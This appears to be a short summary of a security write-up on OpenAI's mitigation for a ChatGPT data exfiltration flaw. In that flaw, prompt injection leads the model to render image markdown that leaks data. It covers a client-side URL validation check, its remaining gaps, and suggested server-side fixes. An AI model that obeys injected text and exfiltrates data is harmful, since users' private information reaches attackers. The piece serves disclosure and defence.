The author suggests further improvements, such as limiting the number of images rendered per response and performing security checks server-side to benefit all clients. Despite these concerns, the author acknowledges the mitigation as a step in the right direction and encourages OpenAI to continue improving security measures.
Key takeaways:
- OpenAI has implemented mitigation steps to address a data exfiltration vulnerability in ChatGPT, which attackers could exploit using image markdown rendering during prompt injection attacks.
- The mitigation involves a client-side call to a validation API before deciding to display an image, which checks if the URL is safe.
- Despite the mitigation, the fix is not perfect and still allows for potential data leaks. The author suggests limiting the number of images that can be rendered per response to further mitigate potential bypasses.
- The current iOS version does not have these improvements, and the author suggests that security checks should be performed on the server side so all clients can benefit from such improvements.